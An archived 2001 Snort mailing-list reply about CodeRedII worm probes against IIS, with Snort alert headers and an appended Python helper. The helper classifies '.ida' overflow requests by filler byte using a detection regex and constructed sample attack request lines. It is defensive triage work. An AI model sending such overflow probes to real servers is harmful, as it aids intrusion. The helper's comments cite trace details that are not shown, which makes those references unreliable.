Snort mailing list archives
Re: A new variation of CodeRed???????????
From: Neil Dickey <neil () geol niu edu>
Date: Thu, 16 Aug 2001 10:46:16 -0500 (CDT)
"John Davey" <john () davey net au> wrote asking:
Does anyone know anything about this or has seen it before?
What you forwarded looks just like what I've been calling CodeRedII. It's the one with the backdoor. The original CodeRed used "N" for the filler instead of "X". I forget where I originally read about it, probably BugTraq. ;-)
I just got hit 70 times in 6 minutes.
Yup, seen it here *many* times. I hope you weren't vulnerable. I've appended the full packet trace if you're interested. Note the embedded "CodeRedII" string.

Best regards,

Neil Dickey, Ph.D.
Research Associate/Sysop
Geology Department
Northern Illinois University
DeKalb, Illinois 60115

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS ISAPI .ida attempt [**]
08/16-00:47:24.035816 131.94.167.24:1352 -> 131.156.X.X:80
TCP TTL:105 TOS:0x0 ID:26029 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0xD8C25DE7 Ack: 0xE988E5FF Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS cmd.exe access [**]
08/16-00:47:24.038189 131.94.167.24:1352 -> 131.156.X.X:80
TCP TTL:105 TOS:0x0 ID:26030 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0xD8C2639B Ack: 0xE988E5FF Win: 0x4470 TcpLen: 20
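An added triage helper, not code from the original post, that applies the distinction Neil draws above: it classifies a captured request line by the filler byte ("N" for the original CodeRed, "X" for CodeRedII) and checks a packet body for the NUL-terminated "CodeRedII" marker visible in the trace. The sample lines are constructed; the 224-byte filler run matches the count in the trace above, and the %u tail is shortened to a placeholder.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Shape of the request line the Snort "WEB-IIS ISAPI .ida attempt" rule fired on:
# GET /default.ida? then a long run of one filler byte, then %uXXXX-encoded bytes,
# then the HTTP version. Both CodeRed variants share this shape; only the filler differs.
IDA_RE = re.compile(
    r'^GET /default\.ida\?(?P<run>N+|X+)(?P<tail>%u[0-9a-fA-F]{4}[^ ]*) HTTP/1\.[01]$'
)

# Filler byte -> variant label, per the discussion above (N = original, X = CodeRedII).
VARIANT_BY_FILLER = {'N': 'CodeRed (original)', 'X': 'CodeRedII'}


@dataclass
class IdaProbe:
    filler: str       # the repeated byte, 'N' or 'X'
    filler_len: int   # length of the run (224 in the trace above)
    variant: str      # label derived from the filler byte


def classify_ida_request(request_line: str) -> Optional[IdaProbe]:
    """Return probe details if the line has the .ida overflow shape, else None."""
    m = IDA_RE.match(request_line.strip())
    if m is None:
        return None
    run = m.group('run')
    return IdaProbe(filler=run[0], filler_len=len(run), variant=VARIANT_BY_FILLER[run[0]])


def has_coderedii_marker(payload: bytes) -> bool:
    """The trace's packet body carries 'CodeRedII' followed by a NUL; look for that."""
    return b'CodeRedII\x00' in payload


def summarize(lines: List[str]) -> List[str]:
    """Label each line with its variant, or 'no .ida probe' if it does not match."""
    labels = []
    for line in lines:
        probe = classify_ida_request(line)
        labels.append(probe.variant if probe else 'no .ida probe')
    return labels


# Constructed sample lines (not taken from a real log); the %u tail is a placeholder.
SAMPLES = [
    'GET /default.ida?' + 'X' * 224 + '%u9090%u9090%u9090 HTTP/1.0',
    'GET /default.ida?' + 'N' * 224 + '%u9090%u9090%u9090 HTTP/1.0',
    'GET /index.html HTTP/1.0',
]

if __name__ == '__main__':
    for line, label in zip(SAMPLES, summarize(SAMPLES)):
        print(f'{label:20s} {line[:40]}...')
```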